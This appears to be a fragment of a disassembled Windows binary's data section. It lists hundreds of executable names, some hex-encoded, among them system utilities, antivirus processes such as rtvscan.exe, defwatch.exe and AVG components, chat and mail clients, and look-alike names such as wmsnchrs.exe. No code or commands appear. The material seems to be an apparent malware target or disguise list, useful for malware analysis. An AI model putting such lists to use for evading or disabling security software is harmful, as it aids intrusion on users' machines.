dd offset dword_449144
dd offset dword_449138
dd offset dword_449130
dd offset dword_449124
dd offset dword_449118
dd offset dword_44910C
dd offset dword_4490FC
dd offset dword_4490F0
dd offset dword_4490E0
dd offset dword_4490D4
dd offset dword_4490C8
dd offset dword_4490B8
dd offset aUninstall__exe ; "uninstall_.exe"
dd offset aTrkwkss_exe ; "trkwkss.exe"
dd offset aWuaucpl_exe ; "wuaucpl.exe"
dd offset aTrkwksvc_exe ; "trkwksvc.exe"
dd offset aWmssvc_exe ; "wmssvc.exe"
dd offset aWmsncs_exe ; "wmsncs.exe"
dd offset aWiadss_exe ; "wiadss.exe"
dd offset aWmsnchrs_exe ; "wmsnchrs.exe"
dword_4490B8 dd 6C706D77h, 72657961h, 6578652Eh, 0dword_4490C8 dd 726E6977h, 652E7261h, 6578hdword_4490D4 dd 69766F6Dh, 2E6B6D65h, 657865hdword_4490E0 dd 61677661h, 7276736Dh, 6578652Eh, 0dword_4490F0 dd 63677661h, 78652E63h, 65hdword_4490FC dd 75677661h, 63767370h, 6578652Eh, 0dword_44910C dd 63617061h, 652E6568h, 6578hdword_449118 dd 70616D6Eh, 6578652Eh, 0dword_449124 dd 74747570h, 78652E79h, 65hdword_449130 dd 63732E2Ah, 72hdword_449138 dd 7A6E6977h, 652E7069h, 6578hdword_449144 dd 65747563h, 2E707466h, 657865hdword_449150 dd 73616C66h, 70786668h, 6578652Eh, 0dword_449160 dd 54616554h, 72656D69h, 6578652Eh, 0dword_449170 dd 7253534Ch, 652E6376h, 6578haWvsscheduler_e db 'WVSScheduler.exe',0 ; DATA XREF: .text:00449058�o
align 10h
aWmpnscfg_exe db 'wmpnscfg.exe',0 ; DATA XREF: .text:00449050�o
align 10h
aAutoexec_bat db 'AUTOEXEC.BAT',0 ; DATA XREF: .text:0044904C�o
align 10h
aSteam_exe db 'steam.exe',0 ; DATA XREF: .text:00449048�o
align 4
aWordpad_exe db 'wordpad.exe',0 ; DATA XREF: .text:00449044�o
aCcsetmgr_exe db 'ccsetmgr.exe',0 ; DATA XREF: .text:0044903C�o
align 4
aCcevtmgr_exe db 'ccevtmgr.exe',0 ; DATA XREF: .text:00449038�o
align 4
aAim_exe db 'aim.exe',0 ; DATA XREF: .text:00449034�o
aCcapp_exe db 'ccapp.exe',0 ; DATA XREF: .text:00449030�o
align 4
aRtvscan_exe db 'rtvscan.exe',0 ; DATA XREF: .text:0044902C�o
aDefwatch_exe db 'defwatch.exe',0 ; DATA XREF: .text:00449028�o
align 4
aMsoe_exe db 'msoe.exe',0 ; DATA XREF: .text:00449024�o
align 4
aMsimn_exe db 'msimn.exe',0 ; DATA XREF: .text:00449020�o
align 10h
aThunderbird_ex db 'thunderbird.exe',0 ; DATA XREF: .text:00449018�o
aFirefox_exe db 'firefox.exe',0 ; DATA XREF: .text:00449014�o
aXchat_exe db 'xchat.exe',0 ; DATA XREF: .text:00449010�o
align 4
aMirc_exe db 'mirc.exe',0 ; DATA XREF: .text:0044900C�o
align 4
aMsmsgs_exe db 'msmsgs.exe',0 ; DATA XREF: .text:00449008�o
align 10h
aWmiprvse_exe db 'wmiprvse.exe',0 ; DATA XREF: .text:00449004�o
align 10h
aMsnmsgr_exe db 'msnmsgr.exe',0 ; DATA XREF: .text:00449000�o
aMswupd_exe db 'mswupd.exe',0 ; DATA XREF: .text:00448FFC�o
align 4
aMsxml32_exe db 'msxml32.exe',0 ; DATA XREF: .text:00448FF8�o
aWmpcodecs_exe db 'wmpcodecs.exe',0 ; DATA XREF: .text:00448FF4�o
align 4
aSound_exe db '*sound*.exe',0 ; DATA XREF: .text:00448FE4�o
aHtpatch_exe db 'htpatch.exe',0 ; DATA XREF: .text:00448FD4�o
aWinhelp_exe db 'winhelp.exe',0 ; DATA XREF: .text:00448FC8�o
aTaskman_exe db 'TASKMAN.EXE',0 ; DATA XREF: .text:00448FBC�o
aSt6unst_exe db 'ST6UNST.EXE',0 ; DATA XREF: .text:00448FB8�o
aSoundman_exe db 'SOUNDMAN.EXE',0 ; DATA XREF: .text:00448FB4�o
align 10h
aSetup1_exe db 'Setup1.exe',0 ; DATA XREF: .text:00448FB0�o
align 4
aSetdebug_exe db 'setdebug.exe',0 ; DATA XREF: .text:00448FAC�o
align 4
aRegtlib_exe db 'REGTLIB.EXE',0 ; DATA XREF: .text:00448FA8�o
aRegedit_exe db 'regedit.exe',0 ; DATA XREF: .text:00448FA4�o
aNotepad_exe db 'NOTEPAD.EXE',0 ; DATA XREF: .text:00448FA0�o
aIun6002_exe db 'iun6002.exe',0 ; DATA XREF: .text:00448F9C�o
aIsuninst_exe db 'IsUninst.exe',0 ; DATA XREF: .text:00448F98�o
align 4
aHh_exe db 'hh.exe',0 ; DATA XREF: .text:00448F94�o
align 4
aExplorer_exe_0 db 'explorer.exe',0 ; DATA XREF: .text:00448F90�o
align 4
aAlcupd_exe db 'alcupd.exe',0 ; DATA XREF: .text:00448F8C�o
align 10h
aAlcrmv_exe db 'alcrmv.exe',0 ; DATA XREF: .text:00448F88�o
align 4
aRtlupd_exe db 'RtlUpd.exe',0 ; DATA XREF: .text:00448F84�o
align 4
aMiccal_exe db 'MicCal.exe',0 ; DATA XREF: .text:00448F80�o
align 4
aRthdcpl_exe db 'RTHDCPL.EXE',0 ; DATA XREF: .text:00448F78�o
aAlcwzrd_exe db 'ALCWZRD.EXE',0 ; DATA XREF: .text:00448F70�o
aAlcmtr_exe db 'ALCMTR.EXE',0 ; DATA XREF: .text:00448F6C�o
align 4
aWrvmchars_exe db 'wrvmchars.exe',0 ; DATA XREF: .text:00448F5C�o
align 4
aWmsnchrs_exe db 'wmsnchrs.exe',0 ; DATA XREF: .text:00448F58�o
; .text:004490B4�o
align 4
aWiadss_exe db 'wiadss.exe',0 ; DATA XREF: .text:00448F54�o
; .text:004490B0�o
align 4
aWmsncs_exe db 'wmsncs.exe',0 ; DATA XREF: .text:00448F50�o
; .text:004490AC�o
align 10h
aWmssvc_exe db 'wmssvc.exe',0 ; DATA XREF: .text:00448F4C�o
; .text:004490A8�o
align 4
aTrkwksvc_exe db 'trkwksvc.exe',0 ; DATA XREF: .text:00448F48�o
; .text:004490A4�o
align 4
aWuaucpl_exe db 'wuaucpl.exe',0 ; DATA XREF: .text:00448F44�o
; .text:004490A0�o
aTrkwkss_exe db 'trkwkss.exe',0 ; DATA XREF: .text:00448F40�o
; .text:0044909C�o
aUninstall__exe db 'uninstall_.exe',0 ; DATA XREF: .text:00448F3C�o
; .text:00449098�o
align 4
aHidserv_exe db 'hidserv.exe',0 ; DATA XREF: .text:00448F38�o
aSlsvc_exe db 'slsvc.exe',0 ; DATA XREF: .text:00448F34�o
align 4
aSdclt_exe db 'sdclt.exe',0 ; DATA XREF: .text:00448F30�o
align 4
aRegsvc_exe db 'regsvc.exe',0 ; DATA XREF: .text:00448F2C�o
align 4
aMssearch_exe db 'mssearch.exe',0 ; DATA XREF: .text:00448F28�o
align 4
aMdm_exe db 'mdm.exe',0 ; DATA XREF: .text:00448F24�o
aLsm_exe db 'lsm.exe',0 ; DATA XREF: .text:00448F20�o
aDwm_exe db 'dwm.exe',0 ; DATA XREF: .text:00448F1C�o
aLexbces_exe db 'lexbces.exe',0 ; DATA XREF: .text:00448F18�o
aLoadqm_exe db 'loadqm.exe',0 ; DATA XREF: .text:00448F14�o
align 4
aSmax4pnp_exe db 'smax4pnp.exe',0 ; DATA XREF: .text:00448F10�o
; .text:00448FE0�o
align 4
aTphkmgr_exe db 'TPHKMGR.exe',0 ; DATA XREF: .text:00448F0C�o
aCli_exe db 'cli.exe',0 ; DATA XREF: .text:00448F08�o
aHpzipm12_exe db 'HPZipm12.exe',0 ; DATA XREF: .text:00448F04�o
align 4
aNhksrv_exe db 'nhksrv.exe',0 ; DATA XREF: .text:00448F00�o
align 4
aHpcmpmgr_exe db 'hpcmpmgr.exe',0 ; DATA XREF: .text:00448EFC�o
align 4
aHpsysdrv_exe db 'hpsysdrv.exe',0 ; DATA XREF: .text:00448EF8�o
align 4
aNmssvc_exe db 'nmssvc.exe',0 ; DATA XREF: .text:00448EF4�o
align 10h
aSmagent_exe db 'smagent.exe',0 ; DATA XREF: .text:00448EF0�o
; .text:00448FDC�o
aMstask_exe db 'mstask.exe',0 ; DATA XREF: .text:00448EEC�o
align 4
aPctspk_exe db 'pctspk.exe',0 ; DATA XREF: .text:00448EE8�o
align 4
aIgfxtray_exe db 'igfxtray.exe',0 ; DATA XREF: .text:00448EE4�o
align 4
aIgfxpers_exe db 'igfxpers.exe',0 ; DATA XREF: .text:00448EE0�o
align 4
aInetinfo_exe db 'inetinfo.exe',0 ; DATA XREF: .text:00448EDC�o
align 4
aCrypserv_exe db 'crypserv.exe',0 ; DATA XREF: .text:00448ED8�o
align 4
aWisptis_exe db 'wisptis.exe',0 ; DATA XREF: .text:00448ED4�o
aQttask_exe db 'qttask.exe',0 ; DATA XREF: .text:00448ED0�o
align 4
aPoint32_exe db 'point32.exe',0 ; DATA XREF: .text:00448ECC�o
; .text:00448FD8�o
aJusched_exe db 'jusched.exe',0 ; DATA XREF: .text:00448EC8�o
aHotkey_exe db 'hotkey.exe',0 ; DATA XREF: .text:00448EC4�o
align 10h
aHkcmd_exe db 'hkcmd.exe',0 ; DATA XREF: .text:00448EC0�o
align 4
aTaskeng_exe db 'taskeng.exe',0 ; DATA XREF: .text:00448EBC�o
aWercon_exe db 'wercon.exe',0 ; DATA XREF: .text:00448EB8�o
align 4
aWinmgmt_exe db 'winmgmt.exe',0 ; DATA XREF: .text:00448EB4�o
aWmiexe_exe db 'wmiexe.exe',0 ; DATA XREF: .text:00448EB0�o
align 4
aPenservice_exe db 'penservice.exe',0 ; DATA XREF: .text:00448EAC�o
align 4
aWudfhost_exe db 'WUDFHost.exe',0 ; DATA XREF: .text:00448EA8�o
align 4
aInternat_exe db 'internat.exe',0 ; DATA XREF: .text:00448EA0�o
align 4
aDevldr32_exe db 'devldr32.exe',0 ; DATA XREF: .text:00448E9C�o
align 4
aSystem_1 db 'System',0 ; DATA XREF: .text:00448E98�o
; .text:00448FD0�o
align 4
aSstext3d_scr db 'sstext3d.scr',0 ; DATA XREF: .text:00448E94�o
align 4
aSsstars_scr db 'ssstars.scr',0 ; DATA XREF: .text:00448E90�o
aSspipes_scr db 'sspipes.scr',0 ; DATA XREF: .text:00448E8C�o
aSsmyst_scr db 'ssmyst.scr',0 ; DATA XREF: .text:00448E88�o
align 4
aSsmypics_scr db 'ssmypics.scr',0 ; DATA XREF: .text:00448E84�o
align 4
aSsmarque_scr db 'ssmarque.scr',0 ; DATA XREF: .text:00448E80�o
align 4
aSsflwbox_scr db 'ssflwbox.scr',0 ; DATA XREF: .text:00448E7C�o
align 4
aSsbezier_scr db 'ssbezier.scr',0 ; DATA XREF: .text:00448E78�o
align 4
aSs3dfo_scr db 'ss3dfo.scr',0 ; DATA XREF: .text:00448E74�o
align 4
aSeismosaver_sc db 'SeismoSaver.scr',0 ; DATA XREF: .text:00448E70�o
aScrnsave_scr db 'scrnsave.scr',0 ; DATA XREF: .text:00448E6C�o
align 4
aLogon_scr db 'logon.scr',0 ; DATA XREF: .text:00448E68�o
align 10h
aAcdsee_scr db 'ACDSee.scr',0 ; DATA XREF: .text:00448E64�o
align 4
aXcopy_exe db 'xcopy.exe',0 ; DATA XREF: .text:00448E60�o
align 4
aWupdmgr_exe db 'wupdmgr.exe',0 ; DATA XREF: .text:00448E5C�o
aWuauclt1_exe db 'wuauclt1.exe',0 ; DATA XREF: .text:00448E58�o
align 4
aWuauclt_exe db 'wuauclt.exe',0 ; DATA XREF: .text:00448E54�o
aWscript_exe db 'wscript.exe',0 ; DATA XREF: .text:00448E50�o
aWscntfy_exe db 'wscntfy.exe',0 ; DATA XREF: .text:00448E4C�o
aWrite_exe db 'write.exe',0 ; DATA XREF: .text:00448E48�o
align 4
aWpnpinst_exe db 'wpnpinst.exe',0 ; DATA XREF: .text:00448E44�o
align 4
aWpabaln_exe db 'wpabaln.exe',0 ; DATA XREF: .text:00448E40�o
aWowexec_exe db 'wowexec.exe',0 ; DATA XREF: .text:00448E3C�o
aWowdeb_exe db 'wowdeb.exe',0 ; DATA XREF: .text:00448E38�o
align 4
aWjview_exe db 'wjview.exe',0 ; DATA XREF: .text:00448E34�o
align 4
aWinver_exe db 'winver.exe',0 ; DATA XREF: .text:00448E30�o
align 10h
aWinspool_exe db 'winspool.exe',0 ; DATA XREF: .text:00448E2C�o
align 10h
aWinmsd_exe db 'winmsd.exe',0 ; DATA XREF: .text:00448E28�o
align 4
aWinmine_exe db 'winmine.exe',0 ; DATA XREF: .text:00448E24�o
aWinhlp32_exe db 'winhlp32.exe',0 ; DATA XREF: .text:00448E20�o
; .text:00448FCC�o
align 4
aWindbver_exe db 'WINDBVER.EXE',0 ; DATA XREF: .text:00448E1C�o
align 4
aWinchat_exe db 'winchat.exe',0 ; DATA XREF: .text:00448E18�o
aWiaacmgr_exe db 'wiaacmgr.exe',0 ; DATA XREF: .text:00448E14�o
align 4
aWextract_exe db 'wextract.exe',0 ; DATA XREF: .text:00448E10�o
align 4
aW32tm_exe db 'w32tm.exe',0 ; DATA XREF: .text:00448E0C�o
align 10h
aVwipxspx_exe db 'vwipxspx.exe',0 ; DATA XREF: .text:00448E08�o
align 10h
aVssvc_exe db 'vssvc.exe',0 ; DATA XREF: .text:00448E04�o
align 4
aVssadmin_exe db 'vssadmin.exe',0 ; DATA XREF: .text:00448E00�o
align 4
aViral_exe db 'viral.exe',0 ; DATA XREF: .text:00448DFC�o
align 4
aVerifier_exe db 'verifier.exe',0 ; DATA XREF: .text:00448DF8�o
align 4
aVerclsid_exe db 'verclsid.exe',0 ; DATA XREF: .text:00448DF4�o
align 4
aUtilman_exe db 'utilman.exe',0 ; DATA XREF: .text:00448DF0�o
aUsrshuta_exe db 'usrshuta.exe',0 ; DATA XREF: .text:00448DEC�o
align 4
aUsrprbda_exe db 'usrprbda.exe',0 ; DATA XREF: .text:00448DE8�o
align 4
aUsrmlnka_exe db 'usrmlnka.exe',0 ; DATA XREF: .text:00448DE4�o
align 4
aUserinit_exe db 'userinit.exe',0 ; DATA XREF: .text:00448DE0�o
align 4
aUser_exe db 'user.exe',0 ; DATA XREF: .text:00448DDC�o
align 10h
aUps_exe db 'ups.exe',0 ; DATA XREF: .text:00448DD8�o
aUpnpcont_exe db 'upnpcont.exe',0 ; DATA XREF: .text:00448DD4�o
align 4
aUnlodctr_exe db 'unlodctr.exe',0 ; DATA XREF: .text:00448DD0�o
align 4
aTypeperf_exe db 'typeperf.exe',0 ; DATA XREF: .text:00448DCC�o
align 4
aTwunk_32_exe db 'twunk_32.exe',0 ; DATA XREF: .text:00448DC8�o
; .text:00448FC4�o
align 4
aTwunk_16_exe db 'twunk_16.exe',0 ; DATA XREF: .text:00448DC4�o
; .text:00448FC0�o
align 4
aTsshutdn_exe db 'tsshutdn.exe',0 ; DATA XREF: .text:00448DC0�o
align 4
aTskill_exe db 'tskill.exe',0 ; DATA XREF: .text:00448DBC�o
align 4
aTsdiscon_exe db 'tsdiscon.exe',0 ; DATA XREF: .text:00448DB8�o
align 4
aTscupgrd_exe db 'tscupgrd.exe',0 ; DATA XREF: .text:00448DB4�o
align 4
aTscon_exe db 'tscon.exe',0 ; DATA XREF: .text:00448DB0�o
align 10h
aTracert6_exe db 'tracert6.exe',0 ; DATA XREF: .text:00448DAC�o
align 10h
aTracert_exe db 'tracert.exe',0 ; DATA XREF: .text:00448DA8�o
aTracerpt_exe db 'tracerpt.exe',0 ; DATA XREF: .text:00448DA4�o
align 4
aTourstart_exe db 'tourstart.exe',0 ; DATA XREF: .text:00448DA0�o
align 4
aTlntsvr_exe db 'tlntsvr.exe',0 ; DATA XREF: .text:00448D9C�o
aTlntsess_exe db 'tlntsess.exe',0 ; DATA XREF: .text:00448D98�o
align 4
aTlntadmn_exe db 'tlntadmn.exe',0 ; DATA XREF: .text:00448D94�o
align 4
aTftp_exe db 'tftp.exe',0 ; DATA XREF: .text:00448D90�o
align 4
aTelnet_exe db 'telnet.exe',0 ; DATA XREF: .text:00448D8C�o
align 10h
aTcpsvcs_exe db 'tcpsvcs.exe',0 ; DATA XREF: .text:00448D88�o
aTcmsetup_exe db 'tcmsetup.exe',0 ; DATA XREF: .text:00448D84�o
align 4
aTaskmgr_exe db 'taskmgr.exe',0 ; DATA XREF: .text:00448D80�o
aTaskman_exe_0 db 'taskman.exe',0 ; DATA XREF: .text:00448D7C�o
aTasklist_exe db 'tasklist.exe',0 ; DATA XREF: .text:00448D78�o
align 4
aTaskkill_exe db 'taskkill.exe',0 ; DATA XREF: .text:00448D74�o
align 4
aSystray_exe db 'systray.exe',0 ; DATA XREF: .text:00448D70�o
aSysteminfo_exe db 'systeminfo.exe',0 ; DATA XREF: .text:00448D6C�o
align 10h
aSysocmgr_exe db 'sysocmgr.exe',0 ; DATA XREF: .text:00448D68�o
align 10h
aSyskey_exe db 'syskey.exe',0 ; DATA XREF: .text:00448D64�o
align 4
aSysedit_exe db 'sysedit.exe',0 ; DATA XREF: .text:00448D60�o
aSyncapp_exe db 'syncapp.exe',0 ; DATA XREF: .text:00448D5C�o
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: .text:00448D58�o
aSubst_exe db 'subst.exe',0 ; DATA XREF: .text:00448D54�o
align 4
aSubrange_uce db 'subrange.uce',0 ; DATA XREF: .text:00448D50�o
align 4
aStimon_exe db 'stimon.exe',0 ; DATA XREF: .text:00448D4C�o
align 4
aSpupdsvc_exe db 'spupdsvc.exe',0 ; DATA XREF: .text:00448D48�o
align 4
aSprestrt_exe db 'sprestrt.exe',0 ; DATA XREF: .text:00448D44�o
align 4
aSpoolsv_exe db 'spoolsv.exe',0 ; DATA XREF: .text:00448D40�o
aSpnpinst_exe db 'spnpinst.exe',0 ; DATA XREF: .text:00448D3C�o
align 4
aSpiisupd_exe db 'spiisupd.exe',0 ; DATA XREF: .text:00448D38�o
align 4
aSpider_exe db 'spider.exe',0 ; DATA XREF: .text:00448D34�o
align 10h
aSort_exe db 'sort.exe',0 ; DATA XREF: .text:00448D30�o
align 4
aSol_exe db 'sol.exe',0 ; DATA XREF: .text:00448D2C�o
aSndvol32_exe db 'sndvol32.exe',0 ; DATA XREF: .text:00448D28�o
align 4
aSndrec32_exe db 'sndrec32.exe',0 ; DATA XREF: .text:00448D24�o
align 4
aSmss_exe db 'smss.exe',0 ; DATA XREF: .text:00448D20�o
align 10h
aSmlogsvc_exe db 'smlogsvc.exe',0 ; DATA XREF: .text:00448D1C�o
align 10h
aSmbinst_exe db 'smbinst.exe',0 ; DATA XREF: .text:00448D18�o
aSkeys_exe db 'skeys.exe',0 ; DATA XREF: .text:00448D14�o
align 4
aSigverif_exe db 'sigverif.exe',0 ; DATA XREF: .text:00448D10�o
align 4
aShutdown_exe db 'shutdown.exe',0 ; DATA XREF: .text:00448D0C�o
align 4
aShrpubw_exe db 'shrpubw.exe',0 ; DATA XREF: .text:00448D08�o
aShmgrate_exe db 'shmgrate.exe',0 ; DATA XREF: .text:00448D04�o
align 4
aShare_exe db 'share.exe',0 ; DATA XREF: .text:00448D00�o
align 10h
aShadow_exe db 'shadow.exe',0 ; DATA XREF: .text:00448CFC�o
align 4
aSfc_exe db 'sfc.exe',0 ; DATA XREF: .text:00448CF8�o
aSetver_exe db 'setver.exe',0 ; DATA XREF: .text:00448CF4�o
align 10h
aSetup_exe db 'setup.exe',0 ; DATA XREF: .text:00448CF0�o
align 4
aSethc_exe db 'sethc.exe',0 ; DATA XREF: .text:00448CEC�o
align 4
aSessmgr_exe db 'sessmgr.exe',0 ; DATA XREF: .text:00448CE8�o
aServices_exe db 'services.exe',0 ; DATA XREF: .text:00448CE4�o
align 4
aSecedit_exe db 'secedit.exe',0 ; DATA XREF: .text:00448CE0�o
aSdbinst_exe db 'sdbinst.exe',0 ; DATA XREF: .text:00448CDC�o
aSchtasks_exe db 'schtasks.exe',0 ; DATA XREF: .text:00448CD8�o
align 4
aScardsvr_exe db 'scardsvr.exe',0 ; DATA XREF: .text:00448CD4�o
align 4
aSc_exe db 'sc.exe',0 ; DATA XREF: .text:00448CD0�o
align 4
aSavedump_exe db 'savedump.exe',0 ; DATA XREF: .text:00448CCC�o
align 4
aRwinsta_exe db 'rwinsta.exe',0 ; DATA XREF: .text:00448CC8�o
aRunonce_exe db 'runonce.exe',0 ; DATA XREF: .text:00448CC4�o
aRundll32_exe db 'rundll32.exe',0 ; DATA XREF: .text:00448CC0�o
align 4
aRunas_exe db 'runas.exe',0 ; DATA XREF: .text:00448CBC�o
align 4
aRtlcpl_exe db 'RTLCPL.EXE',0 ; DATA XREF: .text:00448CB8�o
; .text:00448F7C�o
align 4
aRtcshare_exe db 'rtcshare.exe',0 ; DATA XREF: .text:00448CB4�o
align 4
aRsvp_exe db 'rsvp.exe',0 ; DATA XREF: .text:00448CB0�o
align 10h
aRsopprov_exe db 'rsopprov.exe',0 ; DATA XREF: .text:00448CAC�o
align 10h
aRsnotify_exe db 'rsnotify.exe',0 ; DATA XREF: .text:00448CA8�o
align 10h
aRsmui_exe db 'rsmui.exe',0 ; DATA XREF: .text:00448CA4�o
align 4
aRsmsink_exe db 'rsmsink.exe',0 ; DATA XREF: .text:00448CA0�o
aRsm_exe db 'rsm.exe',0 ; DATA XREF: .text:00448C9C�o
aRsh_exe db 'rsh.exe',0 ; DATA XREF: .text:00448C98�o
aRoutemon_exe db 'routemon.exe',0 ; DATA XREF: .text:00448C94�o
align 4
aRoute_exe db 'route.exe',0 ; DATA XREF: .text:00448C90�o
align 4
aRexec_exe db 'rexec.exe',0 ; DATA XREF: .text:00448C8C�o
align 10h
aReset_exe db 'reset.exe',0 ; DATA XREF: .text:00448C88�o
align 4
aReplace_exe db 'replace.exe',0 ; DATA XREF: .text:00448C84�o
aRelog_exe db 'relog.exe',0 ; DATA XREF: .text:00448C80�o
align 4
aRegwiz_exe db 'regwiz.exe',0 ; DATA XREF: .text:00448C7C�o
align 10h
aRegsvr32_exe db 'regsvr32.exe',0 ; DATA XREF: .text:00448C78�o
align 10h
aRegini_exe db 'regini.exe',0 ; DATA XREF: .text:00448C74�o
align 4
aRegedt32_exe db 'regedt32.exe',0 ; DATA XREF: .text:00448C70�o
align 4
aRegcladm_exe db 'REGCLADM.EXE',0 ; DATA XREF: .text:00448C6C�o
align 4
aReg_exe db 'reg.exe',0 ; DATA XREF: .text:00448C68�o
aRedir_exe db 'redir.exe',0 ; DATA XREF: .text:00448C64�o
align 10h
aRecover_exe db 'recover.exe',0 ; DATA XREF: .text:00448C60�o
aRdshost_exe db 'rdshost.exe',0 ; DATA XREF: .text:00448C5C�o
aRdsaddin_exe db 'rdsaddin.exe',0 ; DATA XREF: .text:00448C58�o
align 4
aRdpclip_exe db 'rdpclip.exe',0 ; DATA XREF: .text:00448C54�o
aRcp_exe db 'rcp.exe',0 ; DATA XREF: .text:00448C50�o
aRcimlby_exe db 'rcimlby.exe',0 ; DATA XREF: .text:00448C4C�o
aRasphone_exe db 'rasphone.exe',0 ; DATA XREF: .text:00448C48�o
align 4
aRasdial_exe db 'rasdial.exe',0 ; DATA XREF: .text:00448C44�o
aRasautou_exe db 'rasautou.exe',0 ; DATA XREF: .text:00448C40�o
align 4
aQwinsta_exe db 'qwinsta.exe',0 ; DATA XREF: .text:00448C3C�o
aQprocess_exe db 'qprocess.exe',0 ; DATA XREF: .text:00448C38�o
align 10h
aQappsrv_exe db 'qappsrv.exe',0 ; DATA XREF: .text:00448C34�o
aProxycfg_exe db 'proxycfg.exe',0 ; DATA XREF: .text:00448C30�o
align 4
aProquota_exe db 'proquota.exe',0 ; DATA XREF: .text:00448C2C�o
align 4
aProgman_exe db 'progman.exe',0 ; DATA XREF: .text:00448C28�o
aPrint_exe db 'print.exe',0 ; DATA XREF: .text:00448C24�o
align 4
aPowercfg_exe db 'powercfg.exe',0 ; DATA XREF: .text:00448C20�o
align 4
aPing6_exe db 'ping6.exe',0 ; DATA XREF: .text:00448C1C�o
align 10h
aPing_exe db 'ping.exe',0 ; DATA XREF: .text:00448C18�o
align 4
aPerfmon_exe db 'perfmon.exe',0 ; DATA XREF: .text:00448C14�o
aPentnt_exe db 'pentnt.exe',0 ; DATA XREF: .text:00448C10�o
align 4
aPathping_exe db 'pathping.exe',0 ; DATA XREF: .text:00448C0C�o
align 4
aPackager_exe db 'packager.exe',0 ; DATA XREF: .text:00448C08�o
align 4
aOsuninst_exe db 'osuninst.exe',0 ; DATA XREF: .text:00448C04�o
align 4
aOsk_exe db 'osk.exe',0 ; DATA XREF: .text:00448C00�o
aOpenfiles_exe db 'openfiles.exe',0 ; DATA XREF: .text:00448BFC�o
align 4
aOdbcconf_exe db 'odbcconf.exe',0 ; DATA XREF: .text:00448BF8�o
align 4
aOdbcad32_exe db 'odbcad32.exe',0 ; DATA XREF: .text:00448BF4�o
align 4
aNwscript_exe db 'nwscript.exe',0 ; DATA XREF: .text:00448BF0�o
align 4
aNw16_exe db 'nw16.exe',0 ; DATA XREF: .text:00448BEC�o
align 4
aNtvdm_exe db 'ntvdm.exe',0 ; DATA XREF: .text:00448BE8�o
align 4
aNtsd_exe db 'ntsd.exe',0 ; DATA XREF: .text:00448BE4�o
align 10h
aNtoskrnl_exe db 'ntoskrnl.exe',0 ; DATA XREF: .text:00448BE0�o
align 10h
aNtkrnlpa_exe db 'ntkrnlpa.exe',0 ; DATA XREF: .text:00448BDC�o
align 10h
aNtbackup_exe db 'ntbackup.exe',0 ; DATA XREF: .text:00448BD8�o
align 10h
aNslookup_exe db 'nslookup.exe',0 ; DATA XREF: .text:00448BD4�o
align 10h
aNotepad_exe_0 db 'notepad.exe',0 ; DATA XREF: .text:00448BD0�o
; .text:00449054�o
aNlsfunc_exe db 'nlsfunc.exe',0 ; DATA XREF: .text:00448BCC�o
aNetstat_exe db 'netstat.exe',0 ; DATA XREF: .text:00448BC8�o
aNetsh_exe db 'netsh.exe',0 ; DATA XREF: .text:00448BC4�o
align 10h
aNetsetup_exe db 'netsetup.exe',0 ; DATA XREF: .text:00448BC0�o
align 10h
aNetdde_exe db 'netdde.exe',0 ; DATA XREF: .text:00448BBC�o
align 4
aNet1_exe db 'net1.exe',0 ; DATA XREF: .text:00448BB8�o
align 4
aNet_exe db 'net.exe',0 ; DATA XREF: .text:00448BB4�o
aNerocheck_exe db 'NeroCheck.exe',0 ; DATA XREF: .text:00448BB0�o
align 10h
aNddeapir_exe db 'nddeapir.exe',0 ; DATA XREF: .text:00448BAC�o
align 10h
aNbtstat_exe db 'nbtstat.exe',0 ; DATA XREF: .text:00448BA8�o
aNarrator_exe db 'narrator.exe',0 ; DATA XREF: .text:00448BA4�o
align 4
aMstsc_exe db 'mstsc.exe',0 ; DATA XREF: .text:00448BA0�o
align 4
aMstinit_exe db 'mstinit.exe',0 ; DATA XREF: .text:00448B9C�o
aMsswchx_exe db 'msswchx.exe',0 ; DATA XREF: .text:00448B98�o
aMspaint_exe db 'mspaint.exe',0 ; DATA XREF: .text:00448B94�o
aMsiexec_exe db 'msiexec.exe',0 ; DATA XREF: .text:00448B90�o
aMshta_exe db 'mshta.exe',0 ; DATA XREF: .text:00448B8C�o
align 4
aMshearts_exe db 'mshearts.exe',0 ; DATA XREF: .text:00448B88�o
align 4
aMsg_exe db 'msg.exe',0 ; DATA XREF: .text:00448B84�o
aMsdtc_exe db 'msdtc.exe',0 ; DATA XREF: .text:00448B80�o
align 4
aMscdexnt_exe db 'mscdexnt.exe',0 ; DATA XREF: .text:00448B7C�o
align 4
aMrt_exe db 'MRT.exe',0 ; DATA XREF: .text:00448B78�o
aMrinfo_exe db 'mrinfo.exe',0 ; DATA XREF: .text:00448B74�o
align 4
aMqtgsvc_exe db 'mqtgsvc.exe',0 ; DATA XREF: .text:00448B70�o
aMqsvc_exe db 'mqsvc.exe',0 ; DATA XREF: .text:00448B6C�o
align 4
aMqbkup_exe db 'mqbkup.exe',0 ; DATA XREF: .text:00448B68�o
align 10h
aMpnotify_exe db 'mpnotify.exe',0 ; DATA XREF: .text:00448B64�o
align 10h
aMplay32_exe db 'mplay32.exe',0 ; DATA XREF: .text:00448B60�o
aMountvol_exe db 'mountvol.exe',0 ; DATA XREF: .text:00448B5C�o
align 4
aMobsync_exe db 'mobsync.exe',0 ; DATA XREF: .text:00448B58�o
aMnmsrvc_exe db 'mnmsrvc.exe',0 ; DATA XREF: .text:00448B54�o
aMmc_exe db 'mmc.exe',0 ; DATA XREF: .text:00448B50�o
aMigpwd_exe db 'migpwd.exe',0 ; DATA XREF: .text:00448B4C�o
align 4
aMem_exe db 'mem.exe',0 ; DATA XREF: .text:00448B48�o
aMakecab_exe db 'makecab.exe',0 ; DATA XREF: .text:00448B44�o
aMagnify_exe db 'magnify.exe',0 ; DATA XREF: .text:00448B40�o
aLsass_exe db 'lsass.exe',0 ; DATA XREF: .text:00448B3C�o
align 4
aLpr_exe db 'lpr.exe',0 ; DATA XREF: .text:00448B38�o
aLpq_exe db 'lpq.exe',0 ; DATA XREF: .text:00448B34�o
aLogonui_exe db 'logonui.exe',0 ; DATA XREF: .text:00448B30�o
aLogoff_exe db 'logoff.exe',0 ; DATA XREF: .text:00448B2C�o
align 4
aLogman_exe db 'logman.exe',0 ; DATA XREF: .text:00448B28�o
align 4
aLogagent_exe db 'logagent.exe',0 ; DATA XREF: .text:00448B24�o
align 4
aLodctr_exe db 'lodctr.exe',0 ; DATA XREF: .text:00448B20�o
align 4
aLocator_exe db 'locator.exe',0 ; DATA XREF: .text:00448B1C�o
aLnkstub_exe db 'lnkstub.exe',0 ; DATA XREF: .text:00448B18�o
aLights_exe db 'lights.exe',0 ; DATA XREF: .text:00448B14�o
align 4
